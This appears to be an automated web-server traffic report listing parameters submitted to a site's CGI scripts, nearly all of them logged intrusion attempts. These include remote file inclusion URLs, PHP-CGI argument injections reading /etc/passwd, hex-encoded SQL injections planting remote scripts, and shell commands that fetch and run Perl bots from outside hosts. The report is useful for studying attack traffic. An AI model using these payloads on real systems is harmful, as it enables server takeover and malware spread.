6/13/2005 to 9/29/2014: Top 100 CGI Scripts

Top 10 Parameters with Top 10 values

ScriptTotal Accesses
/ 44,978
Parameters by Submitted Value
Parameter ///////administrator/components/com_remository/admin.remosit
ory.php?mosConfig_absolute_path
ValueAccesses
http://sites.google.com/site/nurhayatisatu/1.txt??? 4
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CI
MG1122.jpg???
2
http://phamsight.com/docs/images/head?? 1
Parameter //kboard/kboard.php?board
ValueAccesses
notice 2
Parameter /Packages.php?sourcedir
ValueAccesses
http://h1.ripway.com/slavezero/slavesukses.txt?? 1
Parameter /show_image_in_imgtag.php?mosConfig_absolute_path
ValueAccesses
http://bethelphotoworks.com//joomla15/templates/rt_perihelio
n/id1.txt???
1
Parameter /zb_path
ValueAccesses
http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? 1
Parameter /zero_vote/error.php?dir
ValueAccesses
http://jentshin.new21.org/zboard_eng//data/cmd/inc??? 1
Parameter
ValueAccesses
9
Parameter ';DECLARE @S CHAR(4000);SET @S
ValueAccesses
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777302E646F7568756E716
E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2
7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6
96B6520272725223E3C2F7469746C653E3C736372697074207372633D226
87474703A2F2F777777302E646F756
1
Parameter -d allow_url_include
ValueAccesses
on -d safe_mode=off -d suhosin.simulation=on -d disable_func
tions="" -d open_basedir=none -d auto_prepend_file=php://inp
ut -n
2
On -d auto_prepend_file=http://84.20.17.144/sites/api.gif -n
/?-d allow_url_include=On -d auto_prepend_file=http://84.20.
17.144/sites/api.gif -n
2
On -d auto_prepend_file=../../../../../../../../../../../../
etc/passwd -n/?-d allow_url_include=On -d auto_prepend_file
=../../../../../../../../../../../../etc/passwd -n
2
on -d safe_mode=off -d suhosin.simulation=on -d disable_func
tions="" -d open_basedir=none -d auto_prepend_file=php://inp
ut -d cgi.force_redirect=0 -d cgi.redirect_status_env="yes"
-d cgi.fix_pathinfo=1 -d auto_prepend_file=php://input -n
1
on -d auto_prepend_file=http://treatmentcenters.org/c1.txt -
n
1
on -d safe_mode=off -d suhosin.simulation=on -d disable_func
tions="" -d open_basedir=none -d auto_prepend_file=php://inp
ut -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
1
On -d auto_prepend_file=http://216.67.238.249/images/api.gif
-n/?-d allow_url_include=On -d auto_prepend_file=http://216
.67.238.249/images/api.gif -n
1
Parameter -dallow_url_include
ValueAccesses
on -dauto_prepend_file=php://input 3
OTHER: 44,942
ScriptTotal Accesses
// 26,276
Parameters by Submitted Value
Parameter
ValueAccesses
1
Parameter *
ValueAccesses
zZz_ADOConnection{}eval($_GET[w]);class zZz_ADOConnection{}/
/
1
Parameter APB_rp
ValueAccesses
http://109.cypanel.com/bbs/icon/icon.gif??? 20
http://www.sanri.org/img/10.jpg??? 3
http://www.haruuu.com/albanianid.txt????? 3
http://www.jugendheim-lenting.de/karten//components/com_gall
eria/kontol.txt?
2
http://www.beautifulchurch.org/images/main/style.css?? 2
http://www.imsrn.fr/images/stories/rocher/thumbnails/robots.
txt??
1
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.hagenclauss.de//vwar/convert/.r/bush?? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
test?? 15
http://www.pmachinery.com/uploads/3e83eab0fd962680.jpg?? 14
http://www.cyos.co.kr/gallery/readme.txt?? 10
http://webmail.netropol.hu//horde/util/dump.txt?? 8
http://latino.yartown.ru/skins/sqlid.txt?? 7
http://www.mandlakaziestates.co.za/contact.txt??? 2
http://incesp.com/id1.txt? 2
http://www.vwgolf-club.ru/forum//includes/gif/newid.txt? 2
http://trimedia-online.net/ihmank/id.txt??? 1
http://withkor.net/snapshot/id1.txt?? 1
Parameter CONFIG_EXT[LIB_DIR]
ValueAccesses
http://www.hotelmoulin.com/db/icon/aa.txt? 5
http://www.johngarzon.com.co/list/heheh.txt???? 5
Parameter DIR_PATH
ValueAccesses
http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? 1
Parameter DIR_PREFIX
ValueAccesses
http://www.uk.rug.nl/php/blog-uraad/data/idv6.txt??? 2
http://www.the-real.com/steelbahamas/id1.txt?? 2
http://loutreandco.free.fr/Pages/Sondages/db/id1.txt? ? 2
http://c.frey.free.fr/r/module/INI/id.txt? ?? 1
http://www.r-sauna.ru//assets/cache/id1.txt? ? 1
http://betterchoice.secureserver101.com//assets/export/id1.t
xt ?
1
http://c.frey.free.fr/r/editor/id1.txt?? ? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://comhelp.spb.ru//idxx.txt??? 6
http://www.seeum.co.kr/zero/zipcode/crespon1.txt? 6
http://www.mandlakaziestates.co.za/contact.txt??? 5
http://sebastianundsarah.de/photos/f/thumbs/test.txt?? 4
http://www.foodntop.com/bbs/data/notice_1/robot.txt???? 3
http://www.luzaclub.ru/McN/idfx.txt?? 3
http://www.kq-china.com/web//plugins/system/id1.txt??? 3
phpshell? 2
http://www.allforweb.co.kr/data/lang/fatal1.txt?? 2
http://www.lazar.ru/manager/processors/copyright.txt??? 2
Parameter GALLERY_BASEDIR../../../../../../../../../../../../../../../
etc/passwd
ValueAccesses
2
OTHER: 26,121
ScriptTotal Accesses
/wusage/summary/ 15,708
Parameters by Submitted Value
Parameter /show_image_in_imgtag.php?mosConfig_absolute_path
ValueAccesses
http://bethelphotoworks.com//joomla15/templates/rt_perihelio
n/id1.txt???
1
Parameter
ValueAccesses
4
Parameter ';DECLARE @S CHAR(4000);SET @S
ValueAccesses
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2
F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2
E313030306D672E636E2F63737273732F772E6A73223E3C2F73637269707
43E3C212D2D272720776865726520272B40432B27206E6F74206C696B652
0272725223E3C2F7469746C653E3C736372697074207372633D226874747
03A2F2F73646F2E
16
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2
F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7
5736572732E35312E6C612F323038383739342E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6
520272725223E3C2F7469746C653E3C736372697074207372633D2268747
4703A2F2F6A732E
1
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777332E73733131716E2E6
36E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2
D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206
C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F
1
Parameter ;DECLARE @S CHAR(4000);SET @S
ValueAccesses
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2
F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2
E313030306D672E636E2F63737273732F772E6A73223E3C2F73637269707
43E3C212D2D272720776865726520272B40432B27206E6F74206C696B652
0272725223E3C2F7469746C653E3C736372697074207372633D226874747
03A2F2F73646F2E3
15
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2
F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E7
5736572732E35312E6C612F323038383739342E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6
520272725223E3C2F7469746C653E3C736372697074207372633D2268747
4703A2F2F6A732E7
1
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777332E73733131716E2E6
36E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2
D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206
C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F7
1
Parameter
ValueAccesses
http://www.wingraphics.com/calendar/id? 1
Parameter ??/help.php?css_path
ValueAccesses
http://www.hanhaho.com/bbs/data/board04/1246476516/clx.txt? 1
Parameter ??????mosConfig_absolute_path
ValueAccesses
http://www.larisco.com/id.txt?? 2
Parameter APB_rp
ValueAccesses
http://www.porto.napoli.it/tt/Ckrid1.txt?? 1
http://mgquadro.fileave.com/fz1.txt?? 1
http://www.skillpickle.com//data/.id/open.txt? 1
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/co
py/id1.txt??
1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.phoxlab.com.br//xmlrpc/fx29id.txt???? 6
http://plengeh.wen.ru/id.txt???? 4
http://www.readingastro.org.uk/graphics/moon/id.txt?? 4
http://www.klammehand.be/forum/language/lang_polish/idmic2.t
xt?
2
http://www.amembersignup.com/signup/id.txt? ?? 2
http://suwung.890m.com/test.txt??? 2
http://ebooks.siteburg.com/chid.txt?? 2
http://www.readingastro.org.uk//wap/in/id.txt?? 2
http://hist.hongik.ac.kr/zb4pl6/data/teszos? 1
http://www.belgraver-warffemius.nl/genealogy/lazarusgb/publi
c/job.txt??
1
OTHER: 15,634
ScriptTotal Accesses
/wusage/ 15,127
Parameters by Submitted Value
Parameter ///////administrator/components/com_remository/admin.remosit
ory.php?mosConfig_absolute_path
ValueAccesses
http://sites.google.com/site/nurhayatisatu/1.txt??? 4
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CI
MG1122.jpg???
3
http://phamsight.com/docs/images/head?? 1
Parameter //kboard/kboard.php?board
ValueAccesses
notice 2
Parameter /show_image_in_imgtag.php?mosConfig_absolute_path
ValueAccesses
http://bethelphotoworks.com//joomla15/templates/rt_perihelio
n/id1.txt???
1
Parameter
ValueAccesses
http://www.wingraphics.com/calendar/id? 1
Parameter APB_rp
ValueAccesses
http://www.bellasbar.co.za//templates_c/5.gif?? 13
http://www.camoplast.com/pdf/1.gif? 5
http://www.baab.it/roxa/id1.txt??? 4
http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? 2
http://www.artvariety.co.za/scan/zfxid1.txt?? 2
http://www.lan51.fr/Portail/tp-images/a.gif?? 2
http://roxd.altervista.org/id1.txt??? 1
http://roxxxx.altervista.org/id1.txt??? 1
http://mgquadro.fileave.com/fz1.txt?? 1
http://www.porto.napoli.it/tt/Ckrid1.txt?? 1
Parameter CFG[libdir]
ValueAccesses
http://aboutav.com//o/id1.txt??? 1
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/co
py/id1.txt??
2
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.phoxlab.com.br//xmlrpc/fx29id.txt???? 6
http://163.16.46.253/appserv/www/fx29id1.txt?? 4
http://hist.hongik.ac.kr/zb4pl6/data/teszos? 1
Parameter CONFIG_EXT[LIB_DIR]
ValueAccesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? 2
http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? 7
http://www.enyzone.cz/components/com_poll/z1?? 7
http://setennis.com/zb41pl8/bbs/id1.txt? 4
http://geschenkpuzzle.de/logs/session/idxx.txt?? 4
http://www.mama-nsk.ru/fx29id.txt? 3
http://users4.nofeehost.com/anjrit/fx/id1.txt?? 3
http://pdcmanagement.com///idfx1.gif??? 3
http://www.steannareptile.it//administrator/id1.txt?? 3
http://saskatchewan.localjobshop.ca/media/id1?? 3
http://www.fraternidadsinaloense.com/foro/uiu.txt?? 2
OTHER: 15,027
ScriptTotal Accesses
/wusage// 9,875
Parameters by Submitted Value
Parameter APB_rp
ValueAccesses
http://www.haruuu.com/albanianid.txt????? 1
http://109.cypanel.com/bbs/icon/icon.gif??? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.cyos.co.kr/gallery/readme.txt?? 4
http://incesp.com/id1.txt? 2
http://withkor.net/snapshot/id1.txt?? 1
http://kb27.co.kr/bbs///id1.txt?? 1
Parameter CONFIG_EXT[LIB_DIR]
ValueAccesses
http://www.johngarzon.com.co/list/heheh.txt???? 5
http://www.hotelmoulin.com/db/icon/aa.txt? 3
Parameter DIR_PREFIX
ValueAccesses
http://www.the-real.com/steelbahamas/id1.txt?? 2
Parameter DOCUMENT_ROOT
ValueAccesses
http://comhelp.spb.ru//idxx.txt??? 6
http://www.seeum.co.kr/zero/zipcode/crespon1.txt? 6
http://www.kq-china.com/web//plugins/system/id1.txt??? 3
http://www.foodntop.com/bbs/data/notice_1/robot.txt???? 3
http://www.lazar.ru/manager/processors/min.txt? 2
http://www.seeum.co.kr/zero/data/idxx.txt?? 2
http://www.allforweb.co.kr/data/lang/fatal1.txt?? 2
http://mobilemagic.sanook.com/cache/fx29id1.txt? 1
http://www.solmae.co.kr///receipt/lib/_private/id1.txt? 1
http://cemerlangclean.com/byz9991.txt?? 1
Parameter GALLERY_BASEDIR
ValueAccesses
http://www.cyos.co.kr/gallery/readme.txt?? 2
http://www.hubns.co.kr//data/list/heheh.txt??? 1
Parameter GLOBALS
ValueAccesses
177
Parameter INCLUDE_FOLDER
ValueAccesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt? 9
http://surihouse.co.kr/bbs/skin/sakk_k/fx29id1.txt? 6
http://www.fileden.com/files/2009/11/5/2637636/id1.txt?? 4
http://www.luvyadating.com/temp/cache/userimages/id/id1.txt?
?
4
http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ve
r1?
3
http://nic.bupt.edu.cn/media/j1.txt?? 3
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1??? 2
http://www.babywaves.com//a/pid?? 2
http://musicadelibreria.net/footer? 2
http://listwm.info//fx29id.txt? 2
Parameter Inc[temp_root]
ValueAccesses
http://creative-alchemy.com/zencart//media/id1.txt??? 1
Parameter Itemid
ValueAccesses
12 56
4
OTHER: 9,550
ScriptTotal Accesses
/wusage/summary/cgi.html//skin/zero_vote/error.php 9,551
Parameters by Submitted Value
Parameter /mosConfig_absolute_path
ValueAccesses
http://tukangbecak.com/ban.gif? 1
Parameter
ValueAccesses
2
Parameter action
ValueAccesses
1
Parameter cmd
ValueAccesses
uname -a; id 35
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
32
id 28
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http
://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson
.110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt;
perl bn.txt
24
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
21
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
21
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
18
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt*
15
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt
13
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
12
Parameter dir
ValueAccesses
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
98
http://www.jungo8949.co.kr/tool25.txt? 97
http://usuarios.arnet.com.ar/larry123/safe.txt? 96
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 85
74
http://www.gumgangfarm.com/shop/data/id.txt? 59
http://216.83.134.89/teste2bot.txt? 52
http://www.freewebs.com/yahwek/phpbot.txt? 49
http://wsteam.net/bt/var.txt? 48
http://www.capsoir.com/images/TRA.txt? 46
Parameter dirhttp://206.71.148.89/pbot.txt??]
ValueAccesses
1
Parameter dirhttp://brutus.altervista.org/php5/insert??
ValueAccesses
1
Parameter dirhttp://www.aabbcc.kit.net/vai.txt?
ValueAccesses
1
Parameter dirhttp://www.ss3s.org/r57.txt?
ValueAccesses
1
Parameter error
ValueAccesses
http://www.codeduc.cl/documentos/id.txt?? 2
OTHER: 8,618
ScriptTotal Accesses
/wusage/summary// 8,462
Parameters by Submitted Value
Parameter -d allow_url_include
ValueAccesses
1 -d auto_prepend_file=php://input -d safe_mode=1 -d suhosin
.simulation=1 -d disable_functions="" -d open_basedir=none -
n
1
1 -d auto_prepend_file=php://input 1
Parameter APB_rp
ValueAccesses
http://109.cypanel.com/bbs/icon/icon.gif??? 20
http://www.haruuu.com/albanianid.txt????? 2
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.hagenclauss.de//vwar/convert/.r/bush?? 1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://www.cyos.co.kr/gallery/readme.txt?? 4
http://incesp.com/id1.txt? 2
http://kb27.co.kr/bbs///id1.txt?? 1
http://trimedia-online.net/ihmank/id.txt??? 1
http://withkor.net/snapshot/id1.txt?? 1
Parameter CONFIG_EXT[LIB_DIR]
ValueAccesses
http://www.johngarzon.com.co/list/heheh.txt???? 9
http://www.hotelmoulin.com/db/icon/aa.txt? 5
Parameter DOCUMENT_ROOT
ValueAccesses
http://vacancesgrandbornand.com/id1.php? 2
http://www.fan-bo.org/siicva/modules/Uploads/Uploads/id1.txt
???
1
http://mobilemagic.sanook.com/cache/fx29id1.txt? 1
http://sample3.itprogram.co.kr//upload/product/id1.txt???? 1
http://www.solmae.co.kr///receipt/lib/_private/id1.txt? 1
Parameter GALLERY_BASEDIR
ValueAccesses
http://www.cyos.co.kr/gallery/readme.txt?? 2
http://www.hubns.co.kr//data/list/heheh.txt??? 1
Parameter GLOBALS
ValueAccesses
41
Parameter INCLUDE_FOLDER
ValueAccesses
http://nic.bupt.edu.cn/media/j1.txt?? 4
http://surihouse.co.kr/bbs/skin/sakk_k/fx29id1.txt? 4
http://www.infocleaners.com/images/title/idosyris.gif???? 2
http://www.cyos.co.kr/gallery/readme.txt?? 2
http://www.roldanfsf.com/www/mambots/system/idc.jpg?? 2
http://zonadeclientes.com/id1.txt?? 2
http://pallmall5.fileave.com/id.txt?? 1
http://neu_2.lasrv-1.de/web/.v6/id.txt??? 1
/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? 1
http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ve
r1?
1
Parameter Itemid
ValueAccesses
1
12 60
9
OTHER: 8,274
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_galleria/galleria.ht
ml.php
7,398
Parameters by Submitted Value
Parameter
ValueAccesses
http://hackangel.xm.com/good.txt? 1
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
29
uname -a; id 25
cd /tmp;rm botnet.txt;wget http://nodan.110mb.com/botnet.txt
;fetch http://nodan.110mb.com/botnet.txt;lwp-download http:/
/nodan.110mb.com/botnet.txt;curl -O http://nodan.110mb.com/b
otnet.txt;lynx http://nodan.110mb.com/botnet.txt;perl botnet
.txt;rm botnet.txt
24
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
22
cd /tmp;rm ng.txt;wget http://www.cer3ja.xpg.com.br/ng.txt;f
etch http://www.cer3ja.xpg.com.br/ng.txt;lwp-download http:/
/www.cer3ja.xpg.com.br/ng.txt;curl -O http://www.cer3ja.xpg.
com.br/ng.txt;lynx http://www.cer3ja.xpg.com.br/ng.txt;perl
ng.txt;rm -rf ng.txt
16
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
15
id 15
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
15
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http
://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson
.110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt;
perl bn.txt
12
cd /tmp;rm -rf pacote*;wget http://br.geocities.com/ozaminha
/pacote.txt;lwp-download http://br.geocities.com/ozaminha/pa
cote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;c
url -o pacote.txt http://br.geocities.com/ozaminha/pacote.tx
t;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.tx
t;lynx -source http://br.geocities.com/ozaminha/pacote.txt >
pacote.txt;perl pacote.txt;rm -rf pacote.txt*
12
Parameter list
ValueAccesses
1 31
Parameter mosConfig_absolute_
ValueAccesses
http://www.lordxpl.xpg.com.br/own.txt???? 8
http://www.lordxpl.we.bs/own.txt???? 6
http://joaobenner.googlepages.com/script2.txt?? 4
2
http://www.lordxpl.xpg.com.br/xxxx.txt?? 1
http://www.lordxpl.xpg.com.br/own.txt?? 1
Parameter mosConfig_absolute_path
ValueAccesses
2
http://ch3z.max-host.pl/z/z/k.txt? 283
http://ownsirc.googlepages.com/botnet.txt? 98
http://www.jungo8949.co.kr/tool25.txt? 95
93
http://www.oslutadores.com/?id=23530 70
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
67
http://www.freewebs.com/yahwek/sete.txt? 64
http://www.? 62
http://www.freewebs.com/yahwek/phpbot.txt? 60
Parameter mosConfig_absolute_pathhttp://kamloopstutor.com/images/Qe3?
ValueAccesses
1
Parameter mosConfig_absolute_pathhttp://www.geocities.com/t0penghit4m/
DXKYTGF-09887/topeng.txt?
ValueAccesses
1
Parameter mosconfig_absolute_path
ValueAccesses
30
http://agatsuma.bestfreewebspace.net/bn 2
Parameter output
ValueAccesses
notfounderror/components/com_galleria/galleria.html.php?mosC
onfig_absolute_path=http://www.vampireunix.net/cmds.txt?
1
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 1
OTHER: 6,229
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_rsgallery/rsgallery.
html.php
6,768
Parameters by Submitted Value
Parameter
ValueAccesses
2
http://badmus.by.ru/id.txt? 1
Parameter cmd
ValueAccesses
uname -a; id 28
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b
ot.txt;rm bot.txt
24
id 24
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
20
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
18
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt
15
cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot.
txt;rm bot.txt
14
cd /tmp;wget http://www.freewebs.com/ferinha/ferinha.txt;cur
l -O -f http://www.freewebs.com/ferinha/ferinha.txt;lynx -so
urce http://www.freewebs.com/ferinha/ferinha.txt;lwp-rget ht
tp://www.freewebs.com/ferinha/ferinha.txt;fetch http://www.f
reewebs.com/ferinha/ferinha.txt;perl ferinha.txt;rm -rf feri
nha.txt
14
